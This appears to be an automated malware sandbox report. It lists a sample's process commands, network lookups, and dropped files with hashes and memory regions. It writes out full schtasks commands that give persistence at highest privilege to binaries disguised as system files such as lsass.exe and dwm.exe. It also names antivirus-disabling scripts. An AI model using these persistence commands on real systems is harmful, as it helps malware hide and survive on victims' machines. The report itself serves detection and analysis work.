schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CqaKHWd6Ky.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tlxpltA24S.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ph6jqiBtuj.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yyRUJOSyqo.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2sHl3bGdB9.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\U04fYIssV3.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\95TPLp0dsP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TiDn8Em9ri.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uLZJId2lFR.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1lJXnITmE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\g1eT93LUFj.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\dwm.exe

"C:\Users\Default User\dwm.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kUVpzpaF2i.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 95.101.143.202:443 www.bing.com tcp
US 8.8.8.8:53 202.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
GB 88.221.135.35:443 r.bing.com tcp
GB 88.221.135.35:443 r.bing.com tcp
GB 88.221.135.35:443 r.bing.com tcp
GB 88.221.135.35:443 r.bing.com tcp
US 8.8.8.8:53 35.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 aefd.nelreports.net udp
GB 173.222.211.41:443 aefd.nelreports.net tcp
GB 173.222.211.41:443 aefd.nelreports.net udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.73:443 login.microsoftonline.com tcp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 www.virustotal.com udp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 www.recaptcha.net udp
GB 172.217.169.35:443 www.recaptcha.net tcp
US 8.8.8.8:53 46.34.125.74.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 8.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.3:443 recaptcha.net tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
GB 142.250.200.3:443 recaptcha.net udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.228:443 www.google.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 228.187.250.142.in-addr.arpa udp
US 216.239.32.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 216.239.32.36:443 region1.google-analytics.com udp

Files

memory/1356-0-0x00007FFC558D3000-0x00007FFC558D5000-memory.dmp

memory/1356-1-0x0000000000690000-0x000000000087C000-memory.dmp

memory/1356-3-0x00007FFC558D0000-0x00007FFC56391000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

MD5 4eab8d478ffd36a7d96ca9a8512cc447
SHA1 cddb1b2d3656d62cdcc67125ec29f2bf83c5f346
SHA256 a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a
SHA512 c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6

memory/1356-21-0x00007FFC558D0000-0x00007FFC56391000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FunChecker .bat

MD5 42afdea7c75bc9074a22ff1be2787959
SHA1 24bc20691a1e99e2cf0b2bca78694701fa47720a
SHA256 3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2
SHA512 d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

C:\Users\Admin\AppData\Local\Temp\clear_av.bat

MD5 48d1db006fe2ae378b0f7efd561d7e56
SHA1 63df10216f0ad81d1d42dd2fc8c4483be5d077fc
SHA256 65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a
SHA512 079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

C:\Users\Admin\AppData\Local\Temp\avdisable.bat

MD5 4c35b71d2d89c8e8eb773854085c56ea
SHA1 ede16731e61348432c85ef13df4beb2be8096d9b
SHA256 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512 a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe

MD5 9a1c593488c39a17105a4ea268b40a0e
SHA1 90f73ef3dd6c79442f27f481957e60f0deaa3ab4
SHA256 9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5
SHA512 a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat

MD5 773bdbbe3e641a349d737adddf1223c0
SHA1 682e313b914460eefe3e2cb7a09beeacd461c108
SHA256 606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a
SHA512 0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

MD5 1876c5d2f6209c7ca5db2b568ec8dc47
SHA1 6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33
SHA256 e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755
SHA512 b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94

memory/4244-37-0x0000000000DE0000-0x0000000001004000-memory.dmp

memory/4244-38-0x0000000003230000-0x000000000324C000-memory.dmp

memory/4244-41-0x000000001C290000-0x000000001C2E6000-memory.dmp

memory/4244-40-0x000000001BC40000-0x000000001BC56000-memory.dmp

memory/4244-39-0x000000001C2E0000-0x000000001C330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eTV455KIx4.bat

MD5 1b4a19e515e0c71312550338819dd017
SHA1 e0fb40a2f66a0ce149d9601c35b9a98340da5558
SHA256 34f1d0dc10332cdd184ee6478dcf2f1aab405cc28da8381b21cde9e92b0591e8
SHA512 4589f9918b6905a6cb304aa8afd461969be3c931434e5dcd2d1b5cff961793783c86685177d42645c32ef99fafaf841fc2cf56eea68a0173e8a2463d660b366f

memory/4380-57-0x000000001C260000-0x000000001C2B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Zlmto9DLwM.bat

MD5 1dd5257e9ff959f9064c605fdb997281
SHA1 d7f7033aea353c677bf570693b22eaa4f2488a2a
SHA256 21def03862c9d210a2e8bc1fd45f5ca48ec0f694b8b04000ec2b834354d9b344
SHA512 421b76964320c850baef10fbeef519bba0e670954889968aa745c7505d4e49d8e7dc78511f6fe98907bdf1a7d053810d53792cb2ba97ac3e7936685112525b51

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SppExtComObj.exe.log

MD5 3ad9a5252966a3ab5b1b3222424717be
SHA1 5397522c86c74ddbfb2585b9613c794f4b4c3410
SHA256 27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249
SHA512 b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6

C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat

MD5 ddf2d11fd25757953bc597227ff4581b
SHA1 11ed5245f8689701a9c525f7f0effcbf6a3a626a
SHA256 ec604011deb01052777763c05b8d734efc0d204b9cdafd8ed5087fecb593c492
SHA512 38ce8264f0e34ad77080b4955c40a7ce7868ee0544c2ec192142c8b63fe70a875034541462141be2694be61bec425c54ee442310850b651539586e34fb43ee8f

C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat

MD5 6b06086a6ead6c6505271c7eff535fa8
SHA1 24a6fe0516c6667c7e894c2ca85248c80773c5fd
SHA256 242eb5be086ab780228861b931a06cd4c66baaaa3ef50d05c428f69a8c5e4e8e
SHA512 0bbc1f905139ea39fe38c03f60b9a7f3d9aab51435e4d5105e6f4cc9734453f1046a7a665f10fb49ce63ffce5a3c462e13d8b06fbfc3de060b62e431f681e67d

C:\Users\Admin\AppData\Local\Temp\nfin2KLgOh.bat

MD5 d8e9fe44acfb6e4ac16d99a4bd5e6285
SHA1 53c32f960d544f50c7fc0969fe5f9fe4a6321afe
SHA256 01d0e3db5c2ae9e5c5c4b667407f3cb1464bcdef1dee93f75bc5619861a405ad
SHA512 ddc04a3b2348a2e365b8457939e64f543b425b9d99fcd9409d7eee2b275258fd2a1b922c11741d3fb8904bc3cfb6726d65e2c5e1d0a47d4fd4289bb4c811d379

C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat

MD5 89477942f9a507d7a9fdb2053220fd67
SHA1 503a33d81cf10a8bd5736f4b645ffd20be5c114e
SHA256 8bf67a6eba80f3a7f817651c0bc6d25bb12bbb1681ad4e7316f42912bff15bfc
SHA512 41e784ce7596bc418f45ee278f28fcbdf9b0bccf525f643fff808604830a4c1d679917875410064c4ad0a6e51319b9c4e6e2b9e3022a7a2f92fc822961f43352

memory/1228-90-0x000000001B4A0000-0x000000001B4F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat

MD5 3c5b866d7ca5b59d0f94ebf999c55500
SHA1 e7d0cf9c88f3ca21511b5c506017c16cb710a82c
SHA256 0a186e99c835e017febaa9d96468d4e583e0b87a8dd08ba31cac74d2939b67d0
SHA512 c89e2d4c700da08db62ba85c8d566ba3c0f1a431eabe89f8d77aa9c0874dd661e71b27f259ec17d1f13eaa0bd46219296519b760b8637df829c7994b9023fd6e

C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat

MD5 93e21e9643a646450c67771926161512
SHA1 08261c3069e77ce8c5b457c77548255b05c7e5a5
SHA256 c5afc6435e3890db3c23e01e610b2e7698817eb9e7f9355ba0aed47124b7c825
SHA512 495d6c850101ff3b3e16435631e216f79e679898bc3b951423813fd7c7d96de348a5db34069090585c04311f73d63cb274a570938aff7b76a14b2ee08ce69246

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a499254d6b5d91f97eb7a86e5f8ca573
SHA1 03dbfebfec8c94a9c06f9b0cd81ebe0a2b8be3d1
SHA256 fb87b758c2b98989df851380293ff6786cb9a5cf2b3a384cec70d9f3eb064499
SHA512 d7adcc76d0470bcd68d7644de3c8d2b6d61df8485979a4752ceea3df4d85bd1c290f72b3d8d5c8d639d5a10afa48d80e457f76b44dd8107ac97eb80fd98c7b0c

\??\pipe\LOCAL\crashpad_512_HKFOZLXYYLPYZBQO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bafce9e4c53a0cb85310891b6b21791b
SHA1 5d70027cc137a7cbb38f5801b15fd97b05e89ee2
SHA256 71fb546b5d2210a56e90b448ee10120cd92c518c8f79fb960f01b918f89f2b00
SHA512 c0e4d3eccc0135ac92051539a18f64b8b8628cfe74e5b019d4f8e1dcbb51a9b49c486a1523885fe6be53da7118c013852e753c26a5490538c1e721fd0188836c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 203e7bb6e4ef7b8bc6250f5ac0844894
SHA1 aa4438d4f8fdce96bda9961c474ab0e8a7e81b03
SHA256 9db6b1601bd08b58a350de8f6bc9d529f7da5572991483c809019cccc7809b52
SHA512 7677d2af29604ee33e69dbd955f223434ca5e2ab892c575bb6fca8b3c076010f88260194ea4f90efc28d4445b2437381cace2a3a321810e45fe7a203cb539f51

C:\Users\Admin\AppData\Local\Temp\gZmmY05In2.bat

MD5 295baaeb275595233c5559cce2a3592e
SHA1 cb8862392efa3273c350dfb63fcf1b4411e48641
SHA256 5bc3486ce8a8b4ae4b6986ae5790386e53cae48e02f7fbb4a7f87c360783b7f2
SHA512 35e89067cf1b3b22249cb341c2d4fc30c9de3ea3576c6f3c827feb3b555b4fcf27302104a0d018463c8c9175afb46d2a6d8b66a91d4d7df129577e3ef8c3d1ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat

MD5 b31a21dccab679ece761bc0a4aba4d15
SHA1 aea1d17f8ef8f10c2c091676a85df83b583de6a2
SHA256 5b57640661d1893837484dd20f3e6e6318ec8ba67ed10a83a1f55049d6b26220
SHA512 114d204d126fad6fca8106b389b6dcf9718e6ae5946951dd872636f85363896b95ae72917c78f15f17ac6d83cfccdba84d22836969facf37c35826385080ff48

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 13d4ddbed0c9e7909651b8d124e11f48
SHA1 d2b4cdfcd845565ba0eed8913d81085575699819
SHA256 7df9a8bb4c5fce0987993867ef6c9cd652609b63529d5141317025bd66e327b8
SHA512 c5e8808262fde54e85bd00275f29c614cbbc71970f22480a5a51ffc171da64c9453dd0bb3eeb17c71c2f9d41f531248eff6214cc925c510331ec052c6221d4ab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 45d0eb41f28e12d8dde26ffc9cb8eaa2
SHA1 861b553b676bb4c9651d6f2cf66a6d56db54d5b3
SHA256 1050b92f981eddf2a90d18e3ff31fd4fbd2c461f0245b5e477563328fc48ba0f
SHA512 558a401efd9b5b038a4cdb2a821472fdcc39a8b2e5e2a3d3586a20526b92f32433fa90a3378f434c62e0d659559de67cbbfd904855708b4fae157d5bc5aae269

C:\Users\Admin\AppData\Local\Temp\vF7CrwxjwX.bat

MD5 3cb432197f9023d40588f8e45763554c
SHA1 a27ad5a9a04af16bbdb56b56dfcfd09590a7a2fe
SHA256 f3d4e00d8899980d852ba33e1f0d1ef93e3688158840bcfa3ebe387b0d840707
SHA512 f50298af20e5cce8ad004a23d9fe37809f0c5c80598a51120bb4aaf3b3e38beee5793807e79dedd4e82dcfe78d633263d3b5bd8dd842f5ade31fcf0d8580838b

C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat

MD5 2c19e007a35a1554ccb2374eb98d71f8
SHA1 2662ad00d9f59929509edf28504f713e01f49605
SHA256 00c182eead9d6caba638d3ccc937d617f1fdd95d87407c448a2d4f7e934542be
SHA512 3668e589f2d654af114939e2d0b53009da3c7524829d95438a890b86719b3b86e3c40f7b9d011c195812dd3801925844e769db2fa505cb575654fb986169d0c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cad6e89c5563c9919bfb1a651775b47d
SHA1 4396f99ccb9b153f2a88d073250220ee801bcfb9
SHA256 6cece870326216dc7bbb089cefffa4fa40b8a086d3b05cc73f56f114d4ba2923
SHA512 1ca1d0bc94edb3211eb7bfd166f19b2dac9901b6cbc46758892636df68e6c532fec664e03b4e1372d9f13ab66ed1e7790553c874a8724224984b8f62aad226c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

MD5 151fb811968eaf8efb840908b89dc9d4
SHA1 7ec811009fd9b0e6d92d12d78b002275f2f1bee1
SHA256 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed
SHA512 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

C:\Users\Admin\AppData\Local\Temp\bhowVEGEG8.bat

MD5 9c1919b6d662f90def2712cbaeb6d2d2
SHA1 7e0bcfc8a92dee6d57d848ae670c73a6b4f6378c
SHA256 0d8c13d21705508c80657aaaf1b25df7ccecefd3d08ea78cc9118e330bc57474
SHA512 b8771dd85b58001186b33ef8b0663ba07af5cb333c0af705b8163d8ed015328823a9a4b0a179b8cd53becf6562074f35f459bd6e157301777761fea1e9532c15

C:\Users\Admin\AppData\Local\Temp\LZh5ueQJla.bat

MD5 19e9d8f4ffb028c23e94ba66cbff56df
SHA1 3c2462fe2c298f0addf847d1309e88f4d3491e39
SHA256 e42d2f8e4fb43a29527562dc351f2b0a36111c583fd6f3f2f150312914079e0e
SHA512 747bf743e8f71c2e914e5381e71e3043d11182488cd0e1b59e2670be0c70a35b89e554590fe28a6a4ed26c179b2820db7a0131c3c707ba23dc158ec7a4a7fe8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d3543ad16260cc53f0a1b0ae352e5a89
SHA1 6d207544aa7ca1c6b7108aa513f763bc118d3324
SHA256 097eae486e55a1bcd0cb8b81dda21969ea84fb41baaf564a0836ec0617b424ef
SHA512 4130a23128a257d344a4633b611023c4dff83b9ce830f6274b66472b17d5eed60cb5db5bfbe136116d70b11f52cc24f1306747e682af3b290628f1729678d89c

memory/5528-467-0x000000001B2F0000-0x000000001B346000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eR3ydISl4k.bat

MD5 a89debc011eb2c0cc1fd1982582035aa
SHA1 a9b77041c66609ae1f37ec00ead14a9e777d79d9
SHA256 424af37b61a131cbd091cf5d36d43eb6c47a390b0887abb466882b0d980568bd
SHA512 f22a6f011d3c5ccdc8afb8be3b63f8a2fe278e258102aca45c5f253b24d76e2bf69dcf95704898f63855776b2d6eb0d82b12586411de31d4066d330c28cb66d7

memory/6092-478-0x000000001B8E0000-0x000000001BA4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iqKdioc4MG.bat

MD5 3f1da1b3a3a4507891cfa1ca53643a28
SHA1 ff7aaa36cb95660009bc3e79fd81b9c0570ee23d
SHA256 e710d4b9b2c6b1debf4362bdc3c476a6301749cd964592be836ad22c7a353b45
SHA512 3157c96e73b1f7a38d9308419703028559a410a438a3d71cd805035aed2fe35df370eef660fbf18a2aeedf75f70046eb948ea9c683014783f38ac9d1c4de79ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe592abf.TMP

MD5 a6b5ed40d626971f6cb2213f56eb0383
SHA1 9f1e012e928a64eee0ba5f5823ca3e16af123a13
SHA256 2c09731395923fa810b8c7861add7fa9e8b92d1fe10b0a45ce60ebf3787bdb85
SHA512 cd0a5f5728fa58673be0b9753a398746189f4cd004ca871f4f8e0e772d5037565496e076528466e08b39bec06077da0e6d5ed602f86af9b919b00009fe795733

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 641b675baf8f3cd8b302fd961f5855ea
SHA1 b15ef9afcb3415d7941933952342080e0940c760
SHA256 d011f036b57dbd2f0ffec8e1a15700dab2d7e816d7c5a9ab67a52adef08549ee
SHA512 9617d083db476737fabd631463cfa21ada1c3ccf68c948dd564badb05f77ae845d2f54976d4f7aa089e0290ce627f619e6f4fe478d1a32a4aa2a722b846bfe07

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 254aad64f168b660c297a702006ddb81
SHA1 0bf3a56d8f0e86b8db8ed8c619791437ff0148c1
SHA256 b91d35ef86a6715aeaf6ebb8d8a416392c975fba8f4f0f3dcbfb6bfc8d56f587
SHA512 67188d53f22f7a739f9c06c4ecfc46aeb8d9b8adfd58605561c557074e60793f2ae3a847372b655969550a4b67afd411189855210ed711ad0ca78e3f124bf241

C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat

MD5 96bdbc6a3ffe2bc5fab8f65e1f6fcdd0
SHA1 e27159bea0d2fc97cd050cdfff0dabda6a56855b
SHA256 18f1bb33db63a9f3d19a65308472c854a510dbe124e47150f0ab9f7cd52dd3e0
SHA512 27ad38090a549b211a2c187674fccad38e7f847d0e1224980c46994a35ead1968b71ad18d273be8ad21645806aa24d0148f58ee5481435cc22a761fd62ec66c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

